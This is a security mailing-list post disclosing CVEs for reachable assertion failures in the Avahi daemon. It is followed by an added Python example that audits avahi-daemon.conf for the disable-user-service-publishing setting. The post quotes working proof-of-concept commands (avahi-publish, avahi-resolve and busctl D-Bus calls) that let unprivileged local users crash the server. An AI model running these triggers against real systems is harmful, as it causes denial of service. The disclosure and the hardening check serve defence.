Date: Fri, 6 Oct 2023 14:19:17 -0700
From: Alan Coopersmith <>
Subject: CVEs assigned for reachable assertions in avahi

While the CVE database still shows them as reserved, Red Hat's & Debian's
trackers show several CVEs being assigned for client requests that can
cause the Avahi server to abort with an assertion failure.  Only one of
them has a fix available so far.


  Reachable assertion in avahi_dns_packet_append_record

"It can be triggered by unprivileged local users
  (unless disable-user-service-publishing is set to yes explicitly):

  avahi-publish -s T _qotd._tcp 22 $(perl -le 'print "A " x 100000')"


  Reachable assertion in avahi_escape_label

"avahi-resolve -n ',.=.}.=.?-.}.=.?.?.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.=.=.?.?.}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.??.?.zM.?`?.}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}??.}.}.?.?.?.z.?.?.}.}.}.?.?.?.r.=.=.}.=.?.}}.}.?.?.?.zM.?`?.}.}.}.?.?.?.r.=.=.?.?`.?.?}.}.}.?.?.?.r.=.?.}.=.?.?.}.?.?.?.}.=.?.?.}'"



  Reachable assertion in dbus_set_host_name

"It can be triggered by unprivileged local users unless 1c599d8 is backported.

  busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server2 SetHostName "s" 'A\.B'"


  Reachable assertion in avahi_rdata_parse

"It can be reproduced by calling something like

   org.freedesktop.Avahi /Client*/EntryGroup* org.freedesktop.Avahi.EntryGroup AddRecord "iiusqquay" 0 0 0 '' 0 0 0 0


   avahi_entry_group_add_record (group, AVAHI_IF_UNSPEC, AVAHI_PROTO_UNSPEC, 0, "Test", 0x01, 0x10, 120, "", 0)

  from inside a client creating EntryGroups. It can be triggered by unprivileged
  users unless disable-user-service-publishing is set to yes explicitly.
  By default it's set to no."


  Reachable assertion in avahi_alternative_host_name

"busctl call org.freedesktop.Avahi / org.freedesktop.Avahi.Server GetAlternativeHostName "s" ').'"

         -Alan Coopersmith-
          Oracle Solaris Engineering -
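Two of the tracker entries quoted above (avahi_dns_packet_append_record and avahi_rdata_parse) say the unprivileged trigger goes away when `disable-user-service-publishing` is explicitly set to `yes`, and that it defaults to `no`. The following is an added example, not part of the post or of the Avahi project, that audits an avahi-daemon.conf for that setting; the two config texts are constructed samples, and a missing key or section is treated as the default (`no`).

```python
import configparser

# Constructed sample resembling a stock avahi-daemon.conf: the option is only
# present as a comment, so the effective value is the default "no".
DEFAULT_STYLE_CONF = """\
[server]
#host-name=foo
#disable-user-service-publishing=no
use-ipv4=yes
use-ipv6=yes

[publish]
#publish-addresses=yes
"""

# Constructed hardened sample: only the daemon itself may publish services,
# which removes the avahi-publish / EntryGroup AddRecord paths for local users.
HARDENED_CONF = """\
[server]
use-ipv4=yes
use-ipv6=yes
disable-user-service-publishing=yes

[publish]
publish-addresses=yes
"""


def user_service_publishing_disabled(conf_text: str) -> bool:
    """Return True only if [server] disable-user-service-publishing is set to yes.

    The option defaults to "no", so a missing [server] section, a missing key,
    or a commented-out key all count as NOT disabled.
    """
    parser = configparser.ConfigParser(interpolation=None)  # '#' and ';' are comments
    parser.read_string(conf_text)
    if not parser.has_section("server"):
        return False
    try:
        return parser.getboolean("server", "disable-user-service-publishing",
                                 fallback=False)
    except ValueError:
        # A value other than yes/no/true/false/on/off/1/0: not a valid "yes".
        return False


def audit(conf_text: str) -> str:
    """One-line finding suitable for a hardening report."""
    if user_service_publishing_disabled(conf_text):
        return "OK: user service publishing disabled"
    return "WARN: unprivileged users may publish services (default no)"
```

On a real host, read `/etc/avahi/avahi-daemon.conf` and pass its contents to `audit()`; the setting only covers the two publishing paths named above, not the SetHostName, GetAlternativeHostName or avahi-resolve triggers.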
